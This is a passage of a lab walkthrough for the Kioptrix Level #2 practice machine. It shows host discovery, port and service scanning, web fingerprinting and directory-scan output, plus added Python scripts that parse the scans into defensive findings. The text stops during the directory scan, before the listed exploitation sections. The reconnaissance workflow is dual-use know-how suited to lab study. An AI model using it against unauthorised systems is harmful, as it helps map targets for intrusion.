VulnHub Range Practice Series -- Kioptrix Level #2

Published: 2024/12/25 9:29:16

Disclaimer

This article is for learning and research only. Do not use the techniques or source code in it for illegal purposes; any negative consequences caused by anyone are not the author's responsibility.

Contents

  • Disclaimer
  • Preface
  • 1. Environment Setup
    • 1.1 Target information
    • 1.2 Target configuration
  • 2. Information Gathering
    • 2.1 Host discovery
      • 2.1.1 netdiscover
      • 2.1.2 nmap host scan
      • 2.1.3 arp-scan host scan
    • 2.2 Port scanning
    • 2.3 Fingerprinting
    • 2.4 Directory scanning
      • 2.4.1 dirb directory scan
      • 2.4.2 dirsearch directory scan
    • 2.5 Vulnerability entry points
      • 2.5.1 Visiting the login page
      • 2.5.2 Visiting the manual page
      • 2.5.3 nikto
      • 2.5.4 SQL injection
        • 2.5.4.1 sqlmap
        • 2.5.4.2 SQL injection
  • 3. Penetration Testing
    • 3.1 Trying command injection
      • 3.1.1 id
      • 3.1.2 passwd
    • 3.2 Reverse shell
      • 3.2.1 Listening on a port in Kali
      • 3.2.2 Command injection
    • 3.3 Privilege escalation
      • 3.3.1 System information
      • 3.3.2 Distribution version
      • 3.3.3 Exploit search
      • 3.3.4 Downloading the script
      • 3.3.5 Reviewing the script
      • 3.3.6 Starting an HTTP server on Kali
      • 3.3.7 Uploading the script
      • 3.3.8 Compiling and running the script
    • 3.4 Changing the password
    • 3.5 SSH login
  • Summary
  • References


Preface

Today's target is the Kioptrix Level #2 machine:

VulnHub is a platform that provides vulnerable environments; most of them are ready-made virtual machine images pre-seeded with several vulnerabilities. This article walks through a penetration test of the Kioptrix Level #2 machine, covering host discovery (nmap / netdiscover), port scanning (nmap / masscan), directory scanning (dirb / dirsearch), netcat, reverse shells, exploit scripts and Linux kernel privilege escalation.

Description

KIOPTRIX VM IMAGE CHALLENGES:
This Kioptrix VM Image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
Source: http://www.kioptrix.com/blog/?page_id=135
Source: http://www.kioptrix.com/blog/?p=49
This is the second release of #2. First release had a bug in it with the web application
2012/Feb/09: Re-release
2011/Feb/11: Original Release

Checksum

  • Original MD5: 987FFB98117BDEB6CA0AAC6EA22E755D
  • Original SHA1: 7A0EA0F414DFA0E05B7DF504F21B325C6D3CC53B
  • Re-release MD5: 987FFB98117BDEB6CA0AAC6EA22E755D
  • Re-release SHA1: 7A0EA0F414DFA0E05B7DF504F21B325C6D3CC53B

1. Environment Setup

1.1 Target information

  • Official link: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
  • Release date: 11 February 2011
  • Size: 761MB
  • Author: Kioptrix
  • Series: Kioptrix
  • Difficulty: ★☆☆☆☆

1.2 Target configuration

  • For the penetration-testing lab setup, see the author's earlier post: VulnHub Range Practice Series - DC-2
  • [Fix] The target VM does not obtain an IP address automatically after being imported into VMware
  • It is recommended to set the attacking machine's (Kali) network mode to [Bridged]

2. Information Gathering

2.1 Host discovery

2.1.1 netdiscover

┌──(root㉿kali)-[/home/kali]
└─# netdiscover -i eth0 -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 10 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 600
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.9     ae:d5:7e:a8:51:6a      3     180  Unknown vendor
 192.168.1.10    00:0c:29:53:19:4c      1      60  VMware, Inc.
 192.168.1.8     22:cb:7f:9b:2c:c1      1      60  Unknown vendor
 192.168.1.1     a0:54:f9:b3:23:54      5     300  Unknown vendor

2.1.2 nmap host scan

┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.1.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 09:57 EDT
Nmap scan report for 192.168.1.6
Host is up (0.079s latency).
MAC Address: 72:41:2D:54:20:9C (Unknown)
Nmap scan report for 192.168.1.8
Host is up (0.066s latency).
MAC Address: 22:CB:7F:9B:2C:C1 (Unknown)
Nmap scan report for 192.168.1.9
Host is up (0.00027s latency).
MAC Address: AE:D5:7E:A8:51:6A (Unknown)
Nmap scan report for 192.168.1.10
Host is up (0.00028s latency).
MAC Address: 00:0C:29:53:19:4C (VMware)
Nmap scan report for 192.168.1.111
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 9.34 seconds

2.1.3 arp-scan host scan

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.1.111
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.9	ae:d5:7e:a8:51:6a	(Unknown: locally administered)
192.168.1.10	00:0c:29:53:19:4c	VMware, Inc.
192.168.1.6	72:41:2d:54:20:9c	(Unknown: locally administered)
192.168.1.8	22:cb:7f:9b:2c:c1	(Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.348 seconds (109.03 hosts/sec). 4 responded


Combining the three discovery methods above, the target machine is identified as:
IP address: 192.168.1.10
MAC address: 00:0c:29:53:19:4c
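The consolidation step above is done by eye in the walkthrough: three tools, three output formats, one host that shows up in all of them with a VMware OUI. The following is an added example (not code from the original post) that does the same cross-referencing programmatically: it parses the netdiscover, `nmap -sP` and `arp-scan -l` formats, merges the results per IP, and flags the scanner's own address, any IP reported with two different MACs (a useful consistency check on an untrusted segment), and hosts whose MAC carries the VMware OUI `00:0c:29`. The sample outputs are constructed, abridged excerpts in the three tools' formats so the script runs offline; the OUI check and the `Host` structure are this example's own choices.

```python
"""Cross-reference host-discovery output from netdiscover, nmap -sP and arp-scan."""
import re
from dataclasses import dataclass, field

# Constructed sample outputs (abridged) in the formats of the three tools.
NETDISCOVER_OUT = """\
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 10 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 600
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.9     ae:d5:7e:a8:51:6a      3     180  Unknown vendor
 192.168.1.10    00:0c:29:53:19:4c      1      60  VMware, Inc.
 192.168.1.8     22:cb:7f:9b:2c:c1      1      60  Unknown vendor
 192.168.1.1     a0:54:f9:b3:23:54      5     300  Unknown vendor
"""
NMAP_OUT = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 09:57 EDT
Nmap scan report for 192.168.1.6
Host is up (0.079s latency).
MAC Address: 72:41:2D:54:20:9C (Unknown)
Nmap scan report for 192.168.1.10
Host is up (0.00028s latency).
MAC Address: 00:0C:29:53:19:4C (VMware)
Nmap scan report for 192.168.1.111
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 9.34 seconds
"""
ARPSCAN_OUT = """\
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.1.111
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.9\tae:d5:7e:a8:51:6a\t(Unknown: locally administered)
192.168.1.10\t00:0c:29:53:19:4c\tVMware, Inc.
192.168.1.6\t72:41:2d:54:20:9c\t(Unknown: locally administered)

3 packets received by filter, 0 packets dropped by kernel
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
MAC = r"([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})"


@dataclass
class Host:
    ip: str
    macs: set = field(default_factory=set)     # MACs reported for this IP, lower-cased
    vendors: set = field(default_factory=set)
    seen_by: set = field(default_factory=set)  # which tools reported the host


def parse_netdiscover(text):
    """Rows look like ' 192.168.1.10   00:0c:29:53:19:4c   1   60  VMware, Inc.'"""
    out = {}
    for m in re.finditer(rf"^\s*{IP}\s+{MAC}\s+\d+\s+\d+\s+(.*?)\s*$", text, re.M):
        out[m.group(1)] = (m.group(2).lower(), m.group(3))
    return out


def parse_nmap_ping(text):
    """'Nmap scan report for <ip>' followed, for remote hosts, by a 'MAC Address:' line."""
    out, ip = {}, None
    for line in text.splitlines():
        m = re.match(rf"Nmap scan report for (?:\S+ \()?{IP}\)?", line)
        if m:
            ip = m.group(1)
            out[ip] = (None, None)  # the scanner's own host has no MAC line
            continue
        m = re.match(rf"MAC Address: {MAC} \((.*)\)", line)
        if m and ip:
            out[ip] = (m.group(1).lower(), m.group(2))
    return out


def parse_arpscan(text):
    """Tab-separated 'ip<TAB>mac<TAB>vendor' rows; also returns the scanner's own IPv4."""
    out, self_ip = {}, None
    for line in text.splitlines():
        m = re.match(rf"Interface: .*IPv4: {IP}", line)
        if m:
            self_ip = m.group(1)
        m = re.match(rf"^{IP}\t{MAC}\t(.*)$", line)
        if m:
            out[m.group(1)] = (m.group(2).lower(), m.group(3))
    return out, self_ip


def consolidate(sources):
    """Merge {tool: {ip: (mac, vendor)}} into one Host record per IP."""
    hosts = {}
    for tool, table in sources.items():
        for ip, (mac, vendor) in table.items():
            h = hosts.setdefault(ip, Host(ip))
            h.seen_by.add(tool)
            if mac:
                h.macs.add(mac)
            if vendor:
                h.vendors.add(vendor)
    return hosts


def report(hosts, self_ip=None):
    """Per host: (ip, number of tools that saw it, MACs, flags)."""
    rows = []
    for ip, h in sorted(hosts.items(), key=lambda kv: [int(o) for o in kv[0].split(".")]):
        flags = []
        if ip == self_ip:
            flags.append("scanner-self")
        if len(h.macs) > 1:
            flags.append("mac-mismatch")  # same IP, different MACs: worth a second look
        if any(m.startswith("00:0c:29") for m in h.macs):
            flags.append("vmware-oui")    # 00:0c:29 is a VMware OUI, as nmap also labels it
        rows.append((ip, len(h.seen_by), sorted(h.macs), flags))
    return rows


if __name__ == "__main__":
    arp, me = parse_arpscan(ARPSCAN_OUT)
    hosts = consolidate({"netdiscover": parse_netdiscover(NETDISCOVER_OUT),
                         "nmap": parse_nmap_ping(NMAP_OUT), "arp-scan": arp})
    for ip, n, macs, flags in report(hosts, me):
        print(f"{ip:15} seen_by={n} macs={macs} {' '.join(flags)}")
```

Run it as-is to see the merged table; to use it on real scans, replace the three constants with the captured output of each tool. The host seen by all three tools with the VMware OUI is the one the walkthrough settles on, and the `mac-mismatch` flag never fires on the sample data, which is exactly what a consistent segment should look like.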

2.2 Port scanning

```bash
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA Kioptrix_Level#2 192.168.1.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 10:00 EDT
Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|_  100000  2            111/udp   rpcbind
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2024-06-09T10:53:50+00:00; -3h09m25s from scanner time.
631/tcp  open  ipp      CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
3306/tcp open  mysql?
MAC Address: 00:0C:29:53:19:4C (VMware)

Host script results:
|_clock-skew: -3h09m25s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.63 seconds
```

From the scan above, the target's open ports are:
Port 22: SSH
Port 80: HTTP
Port 443: HTTPS (SSL)
Port 631: IPP
Port 3306: MySQL
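Beyond the port list, the `-sC -sV` output above already carries findings a defender would act on: the SSH daemon still accepts SSHv1, the HTTPS listener still offers SSLv2 with RC4/DES/export ciphers, the certificate expired in 2010, and CUPS advertises PUT. The following is an added example (not code from the original post) that parses nmap's normal-output format into a per-port structure and turns those script results into named findings. The scan text is a constructed, abridged excerpt in the same format so the script runs offline; the finding names are this example's own.

```python
"""Parse `nmap -sC -sV` normal output and derive findings from the NSE script lines."""
import re
from datetime import datetime

# Constructed excerpt (abridged) in nmap's normal-output format.
NMAP_SV_OUT = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 10:00 EDT
Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
| sslv2: 
|   SSLv2 supported
|_    SSL2_RC4_128_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
3306/tcp open  mysql?
MAC Address: 00:0C:29:53:19:4C (VMware)

Host script results:
|_clock-skew: -3h09m25s
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_services(text):
    """Return (scan_date, {port: {proto, state, service, version, scripts}})."""
    scan_date, ports, cur = None, {}, None
    for line in text.splitlines():
        m = re.match(r"Starting Nmap .* at (\d{4}-\d{2}-\d{2})", line)
        if m:
            scan_date = datetime.strptime(m.group(1), "%Y-%m-%d")
            continue
        m = PORT_RE.match(line)
        if m:
            cur = int(m.group(1))
            ports[cur] = {"proto": m.group(2), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5).strip(),
                          "scripts": []}
        elif line.startswith("|"):
            # NSE script output belongs to the most recent port line; host-level
            # script results come after a non-port line and are ignored here.
            if cur is not None:
                ports[cur]["scripts"].append(line.lstrip("|_ ").rstrip())
        else:
            cur = None  # MAC Address, blank line, etc. ends the port block
    return scan_date, ports


def assess(scan_date, ports):
    """Findings derivable from the scan text itself (no vulnerability database involved)."""
    findings = []
    for port, p in sorted(ports.items()):
        text = "\n".join(p["scripts"])
        if "Server supports SSHv1" in text:
            findings.append((port, "sshv1-enabled"))
        if "SSLv2 supported" in text:
            findings.append((port, "sslv2-enabled"))
        m = re.search(r"Not valid after:\s+(\d{4}-\d{2}-\d{2})", text)
        if m and scan_date and datetime.strptime(m.group(1), "%Y-%m-%d") < scan_date:
            findings.append((port, "certificate-expired"))
        m = re.search(r"Potentially risky methods: (.+)", text)
        if m:
            findings.append((port, "risky-http-methods:" + m.group(1).strip()))
        if p["service"].endswith("?"):
            findings.append((port, "service-unidentified"))  # nmap's guess, not a match
        if p["service"].rstrip("?") == "mysql":
            findings.append((port, "database-port-exposed"))
    return findings


if __name__ == "__main__":
    date, ports = parse_nmap_services(NMAP_SV_OUT)
    for port, p in sorted(ports.items()):
        print(f"{port}/{p['proto']} {p['state']} {p['service']} {p['version']}")
    for port, finding in assess(date, ports):
        print(f"  finding on {port}: {finding}")
```

The parser keys on the `PORT/proto` line format and treats every following `|`-prefixed line as that port's script output, which is how nmap lays out `-sC` results; feeding it the full scan from the walkthrough (or `-oN` output of any other host) needs no changes. The findings are deliberately limited to what the scan text states, so the checks are evidence a defender can act on directly: disable SSHv1 and SSLv2, renew the certificate, and review whether CUPS and MySQL need to listen on the network at all.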

2.3 Fingerprinting

└─# whatweb -v 192.168.1.10 
WhatWeb report for http://192.168.1.10
Status    : 200 OK
Title     : <None>
IP        : 192.168.1.10
Country   : RESERVED, ZZ

Summary   : Apache[2.0.52], HTTPServer[CentOS][Apache/2.0.52 (CentOS)], PasswordField[psw], PHP[4.3.9], X-Powered-By[PHP/4.3.9]

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and 
	maintain an open-source HTTP server for modern operating 
	systems including UNIX and Windows NT. The goal of this 
	project is to provide a secure, efficient and extensible 
	server that provides HTTP services in sync with the current 
	HTTP standards. 

	Version      : 2.0.52 (from HTTP Server Header)
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ HTTPServer ]
	HTTP server header string. This plugin also attempts to 
	identify the operating system from the server header. 

	OS           : CentOS
	String       : Apache/2.0.52 (CentOS) (from server string)

[ PHP ]
	PHP is a widely-used general-purpose scripting language 
	that is especially suited for Web development and can be 
	embedded into HTML. This plugin identifies PHP errors, 
	modules and versions and extracts the local file path and 
	username if present. 

	Version      : 4.3.9
	Google Dorks: (2)
	Website     : http://www.php.net/

[ PasswordField ]
	find password fields 

	String       : psw (from field name)

[ X-Powered-By ]
	X-Powered-By HTTP header 

	String       : PHP/4.3.9 (from x-powered-by string)

HTTP Headers:
	HTTP/1.1 200 OK
	Date: Sun, 09 Jun 2024 11:28:41 GMT
	Server: Apache/2.0.52 (CentOS)
	X-Powered-By: PHP/4.3.9
	Content-Length: 667
	Connection: close
	Content-Type: text/html; charset=UTF-8


Key information obtained:
Apache[2.0.52], HTTPServer[CentOS][Apache/2.0.52 (CentOS)], PasswordField[psw], PHP[4.3.9], X-Powered-By[PHP/4.3.9]

2.4 Directory scanning

2.4.1 dirb directory scan

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.1.10/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jun  9 10:10:29 2024
URL_BASE: http://192.168.1.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.10/ ----
+ http://192.168.1.10/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.1.10/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.1.10/manual/
+ http://192.168.1.10/usage (CODE:403|SIZE:285)

---- Entering directory: http://192.168.1.10/manual/ ----
==> DIRECTORY: http://192.168.1.10/manual/de/
==> DIRECTORY: http://192.168.1.10/manual/developer/
==> DIRECTORY: http://192.168.1.10/manual/en/
==> DIRECTORY: http://192.168.1.10/manual/faq/
==> DIRECTORY: http://192.168.1.10/manual/fr/
==> DIRECTORY: http://192.168.1.10/manual/howto/
==> DIRECTORY: http://192.168.1.10/manual/images/
+ http://192.168.1.10/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.1.10/manual/ja/
==> DIRECTORY: http://192.168.1.10/manual/ko/
+ http://192.168.1.10/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.10/manual/misc/
==> DIRECTORY: http://192.168.1.10/manual/mod/
==> DIRECTORY: http://192.168.1.10/manual/programs/
==> DIRECTORY: http://192.168.1.10/manual/ru/
==> DIRECTORY: http://192.168.1.10/manual/ssl/
==> DIRECTORY: http://192.168.1.10/manual/style/

---- Entering directory: http://192.168.1.10/manual/de/ ----
+ http://192.168.1.10/manual/de/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/de/developer/
+ http://192.168.1.10/manual/de/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/de/faq/
+ http://192.168.1.10/manual/de/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/de/howto/
==> DIRECTORY: http://192.168.1.10/manual/de/images/
+ http://192.168.1.10/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.1.10/manual/de/ja (CODE:301|SIZE:315)
+ http://192.168.1.10/manual/de/ko (CODE:301|SIZE:315)
+ http://192.168.1.10/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.10/manual/de/misc/
==> DIRECTORY: http://192.168.1.10/manual/de/mod/
==> DIRECTORY: http://192.168.1.10/manual/de/programs/
+ http://192.168.1.10/manual/de/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/de/ssl/
==> DIRECTORY: http://192.168.1.10/manual/de/style/

---- Entering directory: http://192.168.1.10/manual/developer/ ----
+ http://192.168.1.10/manual/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.1.10/manual/en/ ----
+ http://192.168.1.10/manual/en/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/en/developer/
+ http://192.168.1.10/manual/en/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/en/faq/
+ http://192.168.1.10/manual/en/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/en/howto/
==> DIRECTORY: http://192.168.1.10/manual/en/images/
+ http://192.168.1.10/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.1.10/manual/en/ja (CODE:301|SIZE:315)
+ http://192.168.1.10/manual/en/ko (CODE:301|SIZE:315)
+ http://192.168.1.10/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.10/manual/en/misc/
==> DIRECTORY: http://192.168.1.10/manual/en/mod/
==> DIRECTORY: http://192.168.1.10/manual/en/programs/
+ http://192.168.1.10/manual/en/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/en/ssl/
==> DIRECTORY: http://192.168.1.10/manual/en/style/

---- Entering directory: http://192.168.1.10/manual/faq/ ----
+ http://192.168.1.10/manual/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.1.10/manual/fr/ ----
+ http://192.168.1.10/manual/fr/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/fr/developer/
+ http://192.168.1.10/manual/fr/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/fr/faq/
+ http://192.168.1.10/manual/fr/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/fr/howto/
==> DIRECTORY: http://192.168.1.10/manual/fr/images/
+ http://192.168.1.10/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.1.10/manual/fr/ja (CODE:301|SIZE:315)
+ http://192.168.1.10/manual/fr/ko (CODE:301|SIZE:315)
+ http://192.168.1.10/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.10/manual/fr/misc/
==> DIRECTORY: http://192.168.1.10/manual/fr/mod/
==> DIRECTORY: http://192.168.1.10/manual/fr/programs/
+ http://192.168.1.10/manual/fr/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/fr/ssl/
==> DIRECTORY: http://192.168.1.10/manual/fr/style/

---- Entering directory: http://192.168.1.10/manual/howto/ ----
+ http://192.168.1.10/manual/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.1.10/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.10/manual/ja/ ----
+ http://192.168.1.10/manual/ja/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/ja/developer/
+ http://192.168.1.10/manual/ja/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/ja/faq/
+ http://192.168.1.10/manual/ja/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/ja/howto/
==> DIRECTORY: http://192.168.1.10/manual/ja/images/
+ http://192.168.1.10/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.1.10/manual/ja/ja (CODE:301|SIZE:315)
+ http://192.168.1.10/manual/ja/ko (CODE:301|SIZE:315)
+ http://192.168.1.10/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.10/manual/ja/misc/
==> DIRECTORY: http://192.168.1.10/manual/ja/mod/
==> DIRECTORY: http://192.168.1.10/manual/ja/programs/
+ http://192.168.1.10/manual/ja/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/ja/ssl/
==> DIRECTORY: http://192.168.1.10/manual/ja/style/

---- Entering directory: http://192.168.1.10/manual/ko/ ----
+ http://192.168.1.10/manual/ko/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.1.10/manual/ko/developer/
+ http://192.168.1.10/manual/ko/en (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ko/faq/                                                                                                                                                                                 
+ http://192.168.1.10/manual/ko/fr (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ko/howto/                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/ko/images/                                                                                                                                                                              
+ http://192.168.1.10/manual/ko/index.html (CODE:200|SIZE:6954)                                                                                                                                                                   
+ http://192.168.1.10/manual/ko/ja (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ko/ko (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ko/LICENSE (CODE:200|SIZE:11358)                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/ko/misc/                                                                                                                                                                                
==> DIRECTORY: http://192.168.1.10/manual/ko/mod/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ko/programs/                                                                                                                                                                            
+ http://192.168.1.10/manual/ko/ru (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ko/ssl/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ko/style/                                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/misc/ ----
+ http://192.168.1.10/manual/misc/index.html (CODE:200|SIZE:5491)                                                                                                                                                                 
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/mod/ ----
+ http://192.168.1.10/manual/mod/index.html (CODE:200|SIZE:13437)                                                                                                                                                                 
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/programs/ ----
+ http://192.168.1.10/manual/programs/index.html (CODE:200|SIZE:4664)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ru/ ----
+ http://192.168.1.10/manual/ru/de (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ru/developer/                                                                                                                                                                           
+ http://192.168.1.10/manual/ru/en (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ru/faq/                                                                                                                                                                                 
+ http://192.168.1.10/manual/ru/fr (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ru/howto/                                                                                                                                                                               
==> DIRECTORY: http://192.168.1.10/manual/ru/images/                                                                                                                                                                              
+ http://192.168.1.10/manual/ru/index.html (CODE:200|SIZE:7277)                                                                                                                                                                   
+ http://192.168.1.10/manual/ru/ja (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ru/ko (CODE:301|SIZE:315)                                                                                                                                                                            
+ http://192.168.1.10/manual/ru/LICENSE (CODE:200|SIZE:11358)                                                                                                                                                                     
==> DIRECTORY: http://192.168.1.10/manual/ru/misc/                                                                                                                                                                                
==> DIRECTORY: http://192.168.1.10/manual/ru/mod/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ru/programs/                                                                                                                                                                            
+ http://192.168.1.10/manual/ru/ru (CODE:301|SIZE:315)                                                                                                                                                                            
==> DIRECTORY: http://192.168.1.10/manual/ru/ssl/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.1.10/manual/ru/style/                                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/ssl/ ----
+ http://192.168.1.10/manual/ssl/index.html (CODE:200|SIZE:3988)                                                                                                                                                                  
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/developer/ ----
+ http://192.168.1.10/manual/de/developer/index.html (CODE:200|SIZE:4770)                                                                                                                                                         
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/faq/ ----
+ http://192.168.1.10/manual/de/faq/index.html (CODE:200|SIZE:3564)                                                                                                                                                               
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/howto/ ----
+ http://192.168.1.10/manual/de/howto/index.html (CODE:200|SIZE:5685)                                                                                                                                                             
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.10/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
